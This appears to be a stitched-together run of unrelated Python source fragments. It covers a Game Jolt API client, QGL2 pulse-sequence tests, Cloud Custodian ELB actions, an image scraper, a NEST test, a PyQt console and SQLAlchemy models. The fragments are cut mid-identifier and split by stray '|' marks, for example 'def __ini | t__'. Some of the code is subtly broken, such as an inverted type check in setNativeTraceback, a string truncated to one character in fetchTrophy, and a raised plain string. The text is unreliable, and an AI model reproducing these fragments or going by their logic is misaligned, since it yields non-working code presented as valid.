active_encodings = terminal.config['active_encodings']
item = Gtk.MenuItem.new_with_mnemonic(_("Encodings"))
menu.append (item)
submenu = Gtk.Menu ()
item.set_submenu (s |
WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/lgpl.txt>.
import sys
import hashlib
import json
if sys.hexversion > 0x03000000:
try:
import urllib.request
except:
raise ImportError
else:
try:
import urllib
except:
raise ImportError
class GameJoltTrophy(object):
"""
The Class constructors.
The class requires four essential parameters: user name, user token, game ID
and private code. Check the API documentation on Game Jolt's website to see
what those parameters they are. In this code, I used the same names on the
site. If you read it, you can understand what's going on here.
Note that *username* and *user token* can be changed later, but the game id
and the private key must be defined first, as they won't change.
"""
def __ini | t__(self, username, user_token, game_id, private_key):
super(GameJoltTrophy, self).__init__()
self.username = username
self.user_token = user_token
self.game_id = game_id
self.private_key = private_key
self.URL = 'http://gamejolt.com/api/game/v1'
self.nativeTraceback = False
#====== TOOLS ======#
# Used for changing users, setting and/or fixing authentications
def changeUsername(self, username):
"""
Changes the *username* contained on the object
Used for changing, setting and/or | fixing authentications
"""
self.username = username
#
def changeUserToken(self, user_token):
"""
Changes the *user token* contained on the object
Used for changing, setting and/or fixing authentications
"""
self.user_token = user_token
def setSignatureAndgetJSONResponse(self, URL):
"""
Generates a signature from the url and returns the same address, with the
signature added to it.
All singatures are generated with md5, but can be modified below.
This is the only function that generates the signature, so changing the
encoding to SHA1 or other format will affect all URL requests.
"""
if sys.hexversion > 0x03000000:
try:
link = URL + str(self.private_key)
link = link.encode('ascii')
signature = hashlib.md5(link).hexdigest()
URL += '&'+'signature='+str(signature)
response = urllib.request.urlopen(URL)
output = response.read().decode('utf8')
return json.loads(output)['response']
except Exception as error:
if not self.nativeTraceback:
return {'success': 'false', 'message': str(error)}
else:
raise error
else:
try:
link = URL + str(self.private_key)
link = link.encode('ascii')
signature = hashlib.md5(link).hexdigest()
URL += '&'+'signature='+str(signature)
response = urllib.urlopen(URL)
output = response.read().decode('utf8')
return json.loads(output)['response']
except Exception as error:
if not self.nativeTraceback:
return {'success': 'false', 'message': str(error)}
else:
raise error
def setNativeTraceback(self, value):
if not type(value) == bool: self.nativeTraceback = value
else: raise TypeError
#====== USERS ======#
def fetchUserInfo(self):
"""
Fetches the infos of a user as a dictionary type.
**ATTENTION**: it returns a dictionary type value with the key *users*,
containing the user being fetched.
Right now it only fetches the user stored in the object, but can retrive a
list of users. This is not available now, will be implemented later.
"""
URL = self.URL+'/users/?format=json&game_id='+str(self.game_id)+'&'+'username='+str(self.username)
return self.setSignatureAndgetJSONResponse(URL)
def authenticateUser(self):
"""
Authenticate a user defined in the object variable.
The purpose of this method is to check if the user's credential
(name and token) are valid. Then, you're safe to call the other methods
Return a boolean type value.
"""
URL = self.URL+'/users/auth/?format=json&game_id='+str(self.game_id)+'&'+'username='+str(self.username)+\
'&'+'user_token='+str(self.user_token)
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
#====== TROPHIES ======#
def fetchTrophy(self, achieved=None, trophy=None):
"""
The 'trophy' argument receives a list of one or more ID of trophies to be
returned. It ignores the 'achieved' argument, so pass a 'None' value to it.
where you pass the desired number between the braces, separating each trophy
ID with commas.
If 'achieved' is:
> set to True, only the achieved trophies will be returned
> set to False, only trophies that the user hasn't achieved yet will be
returned
> set to None (no argument is passed), then all trophies will be retrieved
"""
URL = self.URL+'/trophies/?format=json&'+\
'game_id='+str(self.game_id)+'&'+'username='+str(self.username)+'&'+'user_token='+str(self.user_token)
if achieved != None:
URL += '&achieved='
if achieved == True: URL += 'true'
if achieved == False: URL += 'false'
else:
if trophy != None:
if type(trophy) == int:
URL += '&trophy_id='+str(trophy)+'&'
elif type(trophy) == list:
miniurl = '&trophy_id='
for t in trophy:
miniurl += str(t)+','
miniurl = miniurl[:1]
URL += miniurl
else:
raise 'Invalid type for trophy: must be int or list.'
return self.setSignatureAndgetJSONResponse(URL)
def addAchieved(self, trophy_id):
"""
Sets a winning trophy for the user.
If the parameters are valid, returns True. Otherwise, it returns False.
"""
URL = self.URL+'/trophies/add-achieved/?'+\
'game_id='+str(self.game_id)+'&'+'user_token='+str(self.user_token)+'&'+'username='+str(self.username)+\
'&'+'trophy_id='+str(trophy_id)
try:
return (self.setSignatureAndgetJSONResponse(URL)['success']) == 'true'
except Exception as error:
return {'success': 'false', 'message': str(error)}
#====== SCORES ======#
def fetchScores(self, limit=10, table_id=None, user_info_only=False):
"""
The *limit* argument is set to 10 by default, but can't be more than 100. If
you pass a higher number, the method will automatically set to the maximum
size.
*table_id* if for returning scores for a specific table. If no arguments are
passed (None), it will return all the tables avaliable.
If *user_info_only* is set to True, only scores for the player stored on the
object will be returned.
"""
URL = self.URL+'/scores/?format=json&game_id='+str(self.game_id)
if user_info_only:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
# ID of the score table
if table_id:
URL += '&table_id='+str(table_id)
# Maximum number of scores should be 100 according with the GJAPI
if limit > 100:
limit = 100
URL += '&limit='+str(limit)
return self.setSignatureAndgetJSONResponse(URL)
def addScores(self, score, sort, table_id=None, extra_data='', guest=False, guestname=''):
"""
This method adds a score to the player or guest.
*score* is a string value describing the score value.
*sort* is the actual score value, a number value. But can be a string too.
For *table_id*, check the fetchScores method.
*extra_data* is a string value with any data you would like to store. It
doesn't appear on the site.
If you want to store a score for a guest instead of the user, you:
> set True to 'guest' parameter.
> set a string value with the name of the guest on 'guestname'
"""
URL = self.URL+'/scores/add/?format=json&game_id='+str(self.game_id)+\
'&score='+str(score)+'&sort='+str(sort)
if not guest:
URL += '&username='+str(self.username)+'&user_token='+str(self.user_token)
else:
URL += '&guest='+str(guestname)
if extra_data:
URL += '&extra_data='+extra_data
if table_id:
URL += '&table_id='+str(table_id)
return self.setSignatureAndgetJSONResponse(URL)
def scoreTable(self):
""" Returns the tables containing the high scores for the game."""
URL = self.URL+'/scores/tables/?format=json&game_id='+str(self.game_id)
return self.setSignatureAndgetJSONResponse(URL)
#====== SESSIONS ======#
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2009, 2013 Zuza Software Foundation
#
# This file is part of Pootle.
#
# Pootle is free software; you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# Pootle is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public Lic | ense along with
# Pootle; if not, see <http://www.gnu.org/licenses/>.
from django import template
re | gister = template.Library()
@register.inclusion_tag('terminology/term_edit.html', takes_context=True)
def render_term_edit(context, form):
template_vars = {
'unit': form.instance,
'form': form,
'language': context['language'],
'source_language': context['source_language'],
}
return template_vars
|
# Transform the returned sequences into the canonical form for comparing
# to the explicit QGL1 version above.
# EG, 'flatten' any embedded lists of sequences.
seqs = testable_sequence(seqs)
# Assert that the QGL1 is the same as the generated QGL2
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
# Tests list of lists of function references, instead of sub-functions
def test_AllXY_alt1(self):
q1 = QubitFactory('q1')
qr = QRegister('q1')
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
resFunction = compile_function(
"test/code/AllXY_alt.py",
"doAllXY",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
def test_AllXY_alt2(self):
q1 = QubitFactory('q1')
qr = QRegister('q1')
expectedseq = []
# Expect a single sequence 4 * 2 * 21 pulses long
# Expect it to start like this:
expectedseq += [
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1),
qwait(channels=(q1,)),
Id(q1),
Id(q1),
MEAS(q1)
]
resFunction = compile_function(
"test/code/AllXY_alt.py",
"doAllXY2",
(qr,))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.assertEqual(len(seqs), 4*21*2)
assertPulseSequenceEqual(self, seqs[:len(expectedseq)], expectedseq)
# BlankingSweeps are OBE, so not tested
class TestCR(unittest.TestCase):
def setUp(self):
channel_setup()
def test_PiRabi(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
controlQR = QRegister(controlQ)
targetQR = QRegister(targetQ)
edge = EdgeFactory(controlQ, targetQ)
lengths = np.linspace(0, 4e-6, 11)
riseFall=40e-9
amp=1
phase=0
calRepeats = 2
expected_seq = []
# Seq1
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
Id(controlQ),
flat_top_gaussian(edge, riseFall, length=l, amp=amp, phase=phase),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Seq2
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
X(controlQ),
flat_top_gaussian(edge, riseFall, length=l, amp=amp, phase=phase),
X(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Add calibration
calseq = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
expected_seq += calseq
expected_seq = testable_sequence(expected_seq)
resFunction = compile_function("src/python/qgl2/basic_sequences/CR | .py",
"PiRabi", (controlQR, targetQR, lengths, riseFall, amp, phase, calRepeats))
seqs = resFunction()
seqs | = testable_sequence(seqs)
self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expected_seq)
def test_EchoCRLen(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
cR = QRegister('q1') # Equivalent to QRegister(controlQ)
tR = QRegister('q2')
# FIXME: Better values!?
lengths = np.linspace(0, 2e-6, 11)
riseFall=40e-9
amp=1
phase=0
calRepeats=2
canc_amp=0
canc_phase=np.pi/2
expected_seq = []
# Seq1
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
Id(controlQ),
echoCR(controlQ, targetQ, length=l, phase=phase, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
Id(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Seq2
for l in lengths:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
X(controlQ),
echoCR(controlQ, targetQ, length=l, phase=phase, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
X(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Add calibration
cal_seqs = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
expected_seq += cal_seqs
expected_seq = testable_sequence(expected_seq)
resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
"EchoCRLen",
(cR, tR, lengths, riseFall, amp, phase, calRepeats, canc_amp, canc_phase) )
seqs = resFunction()
seqs = testable_sequence(seqs)
self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expected_seq)
def test_EchoCRPhase(self):
controlQ = QubitFactory('q1')
targetQ = QubitFactory('q2')
cR = QRegister('q1')
tR = QRegister('q2')
phases = np.linspace(0, pi/2, 11)
riseFall=40e-9
amp=1
length=100e-9
calRepeats=2
canc_amp=0
canc_phase=np.pi/2
expected_seq = []
# Seq1
for p in phases:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
Id(controlQ),
echoCR(controlQ, targetQ, length=length, phase=p, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
Barrier(controlQ, targetQ),
X90(targetQ),
Id(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Seq2
for p in phases:
expected_seq += [
qwait(channels=(controlQ, targetQ)),
X(controlQ),
echoCR(controlQ, targetQ, length=length, phase=p, amp=amp,
riseFall=riseFall, canc_amp=canc_amp, canc_phase=canc_phase),
Barrier(controlQ, targetQ),
X90(targetQ),
X(controlQ),
Barrier(controlQ, targetQ),
MEAS(controlQ),
MEAS(targetQ)
]
# Add calibration
cal_seqs = get_cal_seqs_2qubits(controlQ, targetQ, calRepeats)
expected_seq += cal_seqs
expected_seq = testable_sequence(expected_seq)
resFunction = compile_function("src/python/qgl2/basic_sequences/CR.py",
"EchoCRPhase",
(cR, tR, phases, riseFall, amp, length, calRepeats, canc_amp, canc_phase))
seqs = resFunction()
seqs = testable_sequence(seqs)
self.maxDiff = None
assertPulseSequenceEqual(self, seqs, expected_seq)
class TestDecoupling(unittest.TestCase):
def setUp(self):
channel_setup()
def test_HahnEcho(self):
q = QubitFactory('q1')
qr = QRegister('q1')
steps = 11
pulseSpacings = np.linspace(0, 5e-6, steps)
periods = 0
calRepeats=2
expectedseq = []
for k in range(len(pulseSpacings)):
expectedseq += [
qwait(channels=(q,)),
|
Key": present
actions:
- type: remove-tag
tags: [OldTagKey1, OldTagKey2]
"""
batch_size = 1
permissions = ('elasticloadbalancing:RemoveTags',)
def process_resource_set(self, resource_set, tag_keys):
client = local_session(
self.manager.session_factory).client('elb')
client.remove_tags(
LoadBalancerNames=[r['LoadBalancerName'] for r in resource_set],
Tags=[{'Key': k for k in tag_keys}])
@actions.register('delete')
class Delete(BaseAction):
"""Action to delete ELB(s)
It is recommended to apply a filter to the delete policy to avoid unwanted
deletion of any load balancers.
:example:
.. code-block:: yaml
policies:
- name: elb-delete-unused
resource: elb
filters:
- Instances: []
actions:
- delete
"""
schema = type_schema('delete')
permissions = ('elasticloadbalancing:DeleteLoadBalancer',)
def process(self, load_balancers):
with self.executor_factory(max_workers=2) as w:
list(w.map(self.process_elb, load_balancers))
def process_elb(self, elb):
client = local_session(self.manager.session_factory).client('elb')
self.manager.retry(
client.delete_load_balancer,
LoadBalancerName=elb['LoadBalancerName'])
@actions.register('set-ssl-listener-policy')
class SetSslListenerPolicy(BaseAction):
"""Action to set the ELB SSL listener policy
:example:
| .. code-block:: yaml
policies:
- name: | elb-set-listener-policy
resource: elb
actions:
- type: set-ssl-listener-policy
name: SSLNegotiation-Policy-01
attributes:
- Protocol-SSLv3
- Protocol-TLSv1.1
- DHE-RSA-AES256-SHA256
"""
schema = type_schema(
'set-ssl-listener-policy',
name={'type': 'string'},
attributes={'type': 'array', 'items': {'type': 'string'}},
required=['name', 'attributes'])
permissions = (
'elasticloadbalancing:CreateLoadBalancerPolicy',
'elasticloadbalancing:SetLoadBalancerPoliciesOfListener')
def process(self, load_balancers):
with self.executor_factory(max_workers=3) as w:
list(w.map(self.process_elb, load_balancers))
@worker
def process_elb(self, elb):
if not is_ssl(elb):
return
client = local_session(self.manager.session_factory).client('elb')
# Create a custom policy with epoch timestamp.
# to make it unique within the
# set of policies for this load balancer.
policy_name = self.data.get('name') + '-' + \
str(int(datetime.now(tz=tzutc()).strftime("%s")) * 1000)
lb_name = elb['LoadBalancerName']
attrs = self.data.get('attributes')
policy_attributes = [{'AttributeName': attr, 'AttributeValue': 'true'}
for attr in attrs]
try:
client.create_load_balancer_policy(
LoadBalancerName=lb_name,
PolicyName=policy_name,
PolicyTypeName='SSLNegotiationPolicyType',
PolicyAttributes=policy_attributes)
except ClientError as e:
if e.response['Error']['Code'] not in (
'DuplicatePolicyName', 'DuplicatePolicyNameException',
'DuplicationPolicyNameException'):
raise
# Apply it to all SSL listeners.
ssl_policies = ()
if 'c7n.ssl-policies' in elb:
ssl_policies = elb['c7n.ssl-policies']
for ld in elb['ListenerDescriptions']:
if ld['Listener']['Protocol'] in ('HTTPS', 'SSL'):
policy_names = [policy_name]
# Preserve extant non-ssl listener policies
policy_names.extend(ld.get('PolicyNames', ()))
# Remove extant ssl listener policy
if ssl_policies:
policy_names = list(set(policy_names).difference(ssl_policies))
client.set_load_balancer_policies_of_listener(
LoadBalancerName=lb_name,
LoadBalancerPort=ld['Listener']['LoadBalancerPort'],
PolicyNames=policy_names)
@actions.register('modify-security-groups')
class ELBModifyVpcSecurityGroups(ModifyVpcSecurityGroupsAction):
"""Modify VPC security groups on an ELB."""
permissions = ('elasticloadbalancing:ApplySecurityGroupsToLoadBalancer',)
def process(self, load_balancers):
client = local_session(self.manager.session_factory).client('elb')
groups = super(ELBModifyVpcSecurityGroups, self).get_groups(
load_balancers, 'SecurityGroups')
for idx, l in enumerate(load_balancers):
client.apply_security_groups_to_load_balancer(
LoadBalancerName=l['LoadBalancerName'],
SecurityGroups=groups[idx])
@actions.register('enable-s3-logging')
class EnableS3Logging(BaseAction):
"""Action to enable S3 logging for Elastic Load Balancers.
:example:
.. code-block:: yaml
policies:
- name: elb-test
resource: app-elb
filters:
- type: is-not-logging
actions:
- type: enable-s3-logging
bucket: elblogtest
prefix: dahlogs
emit_interval: 5
"""
schema = type_schema('enable-s3-logging',
bucket={'type': 'string'},
prefix={'type': 'string'},
emit_interval={'type': 'integer'},
)
permissions = ("elasticloadbalancing:ModifyLoadBalancerAttributes",)
def process(self, resources):
client = local_session(self.manager.session_factory).client('elb')
for elb in resources:
elb_name = elb['LoadBalancerName']
log_attrs = {'Enabled':True}
if 'bucket' in self.data:
log_attrs['S3BucketName'] = self.data['bucket']
if 'prefix' in self.data:
log_attrs['S3BucketPrefix'] = self.data['prefix']
if 'emit_interval' in self.data:
log_attrs['EmitInterval'] = self.data['emit_interval']
client.modify_load_balancer_attributes(LoadBalancerName=elb_name,
LoadBalancerAttributes={
'AccessLog': log_attrs
})
return resources
@actions.register('disable-s3-logging')
class DisableS3Logging(BaseAction):
"""Disable s3 logging for ElasticLoadBalancers.
:example:
.. code-block:: yaml
policies:
- name: turn-off-elb-logs
resource: elb
filters:
- type: is-logging
bucket: prodbucket
actions:
- type: disable-elb-logging
"""
schema = type_schema('disable-s3-logging')
permissions = ("elasticloadbalancing:ModifyLoadBalancerAttributes",)
def process(self, resources):
client = local_session(self.manager.session_factory).client('elb')
for elb in resources:
elb_name = elb['LoadBalancerName']
client.modify_load_balancer_attributes(LoadBalancerName=elb_name,
LoadBalancerAttributes={
'AccessLog': {
'Enabled': False}
})
return resources
def is_ssl(b):
for ld in b['ListenerDescriptions']:
if ld['Listener']['Protocol'] in ('HTTPS', 'SSL'):
return True
return False
@filters.register('security-group')
class SecurityGroupFilter(net_filters.SecurityGroupFilter):
"""ELB secu |
#! /usr/bin/python
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 27 18:31:59 2017
@author: katsuya.ishiyama
"""
from numpy import random
# Definition of module level constants
SUCCESS_CODE = 1
FAILURE_CODE = 0
class Strategy():
def __init__(self, n):
_success_probability = _generate_success_probability(n)
_strategy = {i: p for i, p in enumerate(_success_probability, 1)}
self._n = n
self.strategy = _strategy
self.stock_of_strategy = list(_strategy.keys())
self.tried_strategy = []
self.current_strategy = None
self.previous_strategy = None
self.count_same_strategy = 0
self._result_of_trial = None
def choose_strategy(self):
if not self.stock_of_strategy:
raise ValueError('There is no strategy in stock.')
_chosen_id = random.choice(self.stock_of_strategy, 1)[0]
self.previous_strategy = self.current_strategy
self.current_strategy = _chosen_id
self.count_same_strategy = 0
self.stock_of_strategy.remove(_chosen_id)
_chosen_strategy = {
'chosen_strategy': _chosen_id,
'success_probability': self._get_success_probability()
}
return _chosen_strategy
def _get_success_probability(self):
return self.strategy[self.current_strategy]
def try_strategy(self):
if not self.current_strategy:
raise ValueError('No strategy is chosen.')
self.tried_strategy.append(self.current_strategy)
self._result_of_trial = _get_ | trial_result(
p=self._get_success_probability()
)
if self.current_strategy == self.previous_strategy:
self.count_same_strategy += 1
return self._result_of_trial
def _get_trial_result(p):
_trial_result = random.choice([FAILURE_CODE, SUCCESS_CODE], size=1, p=[1 - p, p])
return _trial_result[0]
def _generate_success_probability(size):
return r | andom.sample(size)
|
import urllib2
from HTMLParser import HTMLParser
from traceback import print_exc
from sys import stderr
class _DeHTMLParser(HTMLParser):
'''
利用HTMLParse来解析网页元素
'''
def __init__(self):
HTMLParser.__init__(self)
self.img_links = []
def handle_starttag(self, tag, attrs):
if tag == 'img':
# print(attrs)
try:
if ('pic_type','0') in attrs:
for name, value in attrs:
if name == 'src':
self.img_links.append(value)
except Exception as e:
print(e)
return self.img_links
def dehtml(text):
t | ry:
parser = _DeHTMLParser()
parser.feed(text)
parser.close()
return parser.img_links
except:
print_exc(file=stderr)
return text
de | f main():
html = urllib2.urlopen('http://tieba.baidu.com/p/2166231880')
content = html.read()
print(dehtml(content))
i = 0
for img_list in dehtml(content):
img_content = urllib2.urlopen(img_list).read()
path_name = str(i)+'.jpg'
with open(path_name,'wb') as f:
f.write(img_content)
i+=1
if __name__ == '__main__':
main() |
#!/usr/bin/env python2
""" This is the main module, used to launch the persistency engine """
#from persio import iohandler
import persui.persinterface as ui
def main():
""" Launches the user interface, and keeps it on."""
interface = ui.Persinterface()
while True:
interface.run()
if __name__ == '__main__':
main()
"""
def main_old():
keynames = ["A", "B"]
graph_data1 = [(0, 0, 0, 1), (0, 1, 2, 3)]
gr | aph_data2 = [(2, 3, 0, 1), (0, 6, | 2, 8)]
graph_data = [graph_data1, graph_data2]
name = "tree.xml"
root = iohandler.xh.createindex(keynames)
for i in xrange(2):
iohandler.xh.creategraph(root, graph_data[i], keynames[i], 2)
iohandler.xh.writexml(root, name)
"""
|
# -*- coding: utf-8 -*-
#
# test_get_sp_status.py
#
# This file is part of NEST.
#
# Copyr | ight (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distribu | ted in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Structural Plasticity GetStatus Test
-----------------------
This tests the functionality of the GetStructuralPlasticityStatus
function
"""
import nest
import unittest
__author__ = 'sdiaz'
class TestGetStructuralPlasticityStatus(unittest.TestCase):
neuron_model = 'iaf_psc_alpha'
nest.CopyModel('static_synapse', 'synapse_ex')
nest.SetDefaults('synapse_ex', {'weight': 1.0, 'delay': 1.0})
nest.SetStructuralPlasticityStatus({
'structural_plasticity_synapses': {
'synapse_ex': {
'model': 'synapse_ex',
'post_synaptic_element': 'Den_ex',
'pre_synaptic_element': 'Axon_ex',
},
}
})
growth_curve = {
'growth_curve': "gaussian",
'growth_rate': 0.0001, # (elements/ms)
'continuous': False,
'eta': 0.0, # Ca2+
'eps': 0.05
}
'''
Now we assign the growth curves to the corresponding synaptic
elements
'''
synaptic_elements = {
'Den_ex': growth_curve,
'Den_in': growth_curve,
'Axon_ex': growth_curve,
}
nodes = nest.Create(neuron_model,
2,
{'synaptic_elements': synaptic_elements}
)
all = nest.GetStructuralPlasticityStatus()
print(all)
assert ('structural_plasticity_synapses' in all)
assert ('syn1' in all['structural_plasticity_synapses'])
assert ('structural_plasticity_update_interval' in all)
assert (all['structural_plasticity_update_interval'] == 1000)
sp_synapses = nest.GetStructuralPlasticityStatus(
'structural_plasticity_synapses'
)
print(sp_synapses)
syn = sp_synapses['syn1']
assert ('pre_synaptic_element' in syn)
assert ('post_synaptic_element' in syn)
assert (syn['pre_synaptic_element'] == 'Axon_ex')
assert (syn['post_synaptic_element'] == 'Den_ex')
sp_interval = nest.GetStructuralPlasticityStatus(
'structural_plasticity_update_interval'
)
print(sp_interval)
assert (sp_interval == 1000)
def suite():
test_suite = unittest.makeSuite(
TestGetStructuralPlasticityStatus,
'test'
)
return test_suite
if __name__ == '__main__':
unittest.main()
|
from filer.app | s import FilerConfig
class MyFilerConfig(FilerConfig):
verbose_name = "Dateiverwaltung"
| |
# Copyright (c) 2015 Aaron Kehrer
# Licensed under the terms of the MIT License
# (see fiddle/__init__.py for details)
import os
import unicodedata
from io import StringIO
from PyQt4 import QtCore, QtGui
from fiddle.config import EDITOR_FONT, EDITOR_FONT_SIZE
class PyConsoleTextBrowser(QtGui.QTextBrowser):
def __init__(self, parent=None, process=None):
super(PyConsoleTextBrowser, self).__init__(parent)
self.process = process
# The start position in the QTextBrowser document where new user input will be inserted
self._input_insert_pos = -1
self.history = []
self.history_idx = 0
self.setLineWrapMode(QtGui.QTextEdit.NoWrap)
self.setAcceptRichText(False)
self.setReadOnly(False)
self.setOpenExternalLinks(False)
self.setOpenLinks(False)
self.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse | QtCore.Qt.TextEditorInteraction)
def keyPressEvent(self, event):
if self.process is not None:
# Skip keys modified with Ctrl or Alt
if event.modifiers() != QtCore.Qt.ControlModifier and event.modifiers() != QtCore.Qt.AltModifier:
# Get the insert cursor and make sure it's at the end of the console
cursor = self.textCursor()
cursor.movePosition(QtGui.QTextCursor.End)
if self._input_insert_pos < 0:
self._input_insert_pos = cursor.position()
# Scroll view to end of console
self.setTextCursor(cursor)
self.ensureCursorVisible()
# Process the key event
if event.key() == QtCore.Qt.Key_Up:
# Clear any previous input
self._clear_insert_line(cursor)
# Get the history
if len(self.history) > 0:
self.history_idx -= 1
try:
cursor.insertText(self.history[self.history_idx])
except IndexError:
self.history_idx += 1
cursor.insertText('')
elif event.key() == QtCore.Qt.Key_Down:
# Clear any previous input
self._clear_insert_line(cursor)
# Get the history
if len(self.history) > 0 >= self.history_idx:
self.history_idx += 1
try:
cursor.insertText(self.history[self.history_idx])
except IndexError:
self.history_idx -= 1
cursor.insertText('')
elif event.key() == QtCore.Qt.Key_Return:
txt = self._select_insert_line(cursor)
self.process.write('{0}\n'.format(txt).encode('utf-8'))
# Reset the insert position
self._input_insert_pos = -1
# Update the history
self.history.append(txt)
self.history_idx = 0
# Pass the event on to the parent for handling
return QtGui.QTextBrowser.keyPressEvent(self, event)
def _clear_insert_line(self, cursor):
"""
Remove all the displayed text from the input insert line and clear the input buffer
"""
cursor.setPosition(self._input_insert_pos, QtGui.QTextCursor.KeepAnchor)
cursor.removeSelectedText()
def _select_insert_line(self, cursor):
cursor.setPosition(self._input_insert_pos, QtGui.QTextCursor.KeepAnchor)
txt = cursor.selectedText()
cursor.clearSelection()
return txt
class PyConsoleLineEdit(QtGui.QLineEdit):
"""
https://wiki.python.org/moin/PyQt/Adding%20tab-completion%20to%20a%20QLineEdit
http://www.saltycrane.com/blog/2008/01/how-to-capture-tab-key-press-event-with/
"""
def __init__(self):
super(PyConsoleLineEdit, self).__ | init__()
line_font = QtGui.QFont()
line_font.setFamily(EDITOR_FONT)
line_font.setPointSize(EDITOR_FONT_SIZE)
self.setFont(line_font)
self.history = []
self.history_idx = -1
def event(self, eve | nt):
if event.type() == QtCore.QEvent.KeyPress:
if event.key() == QtCore.Qt.Key_Tab:
if self.text().strip() == '':
self.setText(self.text() + ' ')
return True
elif event.key() == QtCore.Qt.Key_Up:
if len(self.history) > 0 and self.history_idx > 0:
self.history_idx -= 1
self.setText(self.history[self.history_idx])
return True
elif event.key() == QtCore.Qt.Key_Down:
if 0 < len(self.history) > self.history_idx:
self.history_idx += 1
try:
self.setText(self.history[self.history_idx])
except IndexError:
self.setText('')
return True
elif event.key() == QtCore.Qt.Key_Return:
try:
if self.history[-1] != self.text():
self.history.append(self.text())
except IndexError:
self.history.append(self.text())
self.history_idx = len(self.history)
return QtGui.QLineEdit.event(self, event)
return QtGui.QLineEdit.event(self, event)
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011 Piston Cloud Computing, Inc.
# Copyright 2012 Cloudscaling Group, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models.
"""
import six
from sqlalchemy import Column, Integer
from sqlalchemy import DateTime
from sqlalchemy.orm import object_mapper
from solum.openstack.common.db.sqlalchemy import session as sa
from solum.openstack.common import timeutils
class ModelBase(object):
"""Base class for models."""
__table_initialized__ = False
def save(self, session=None):
"""Save this object."""
if not session:
session = sa.get_session()
# NOTE(boris-42): This part of code should be look like:
# session.add(self)
# session.flush()
# But there is a bug in sqlalchemy and eventlet that
# raises NoneType exception if there is no running
# transaction and rollback is called. As long as
# sqlalchemy has this bug we have to create transaction
# explicitly.
with session.begin(subtransactions=True):
session.add(self)
session.flush()
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key)
def get(self, key, default=None):
return getattr(self, key, default)
@property
def _extra_keys(self):
"""Specifies custom fields
Subclasses can override this property to return a list
of custom fields that should be included in their dict
representation.
For reference check tests/db/sqlalchemy/test_models.py
"""
return []
def __iter__(self):
columns = dict(object_mapper(self).c | olumns).keys()
# NOTE(russellb): Allow models to specify other keys that can be looked
# up, beyond the actual db columns. An example would be the 'name'
# property for an Instance.
columns.extend(self._extra_keys)
self._i = iter(columns)
| return self
def next(self):
n = six.advance_iterator(self._i)
return n, getattr(self, n)
def update(self, values):
"""Make the model object behave like a dict."""
for k, v in six.iteritems(values):
setattr(self, k, v)
def iteritems(self):
"""Make the model object behave like a dict.
Includes attributes from joins.
"""
local = dict(self)
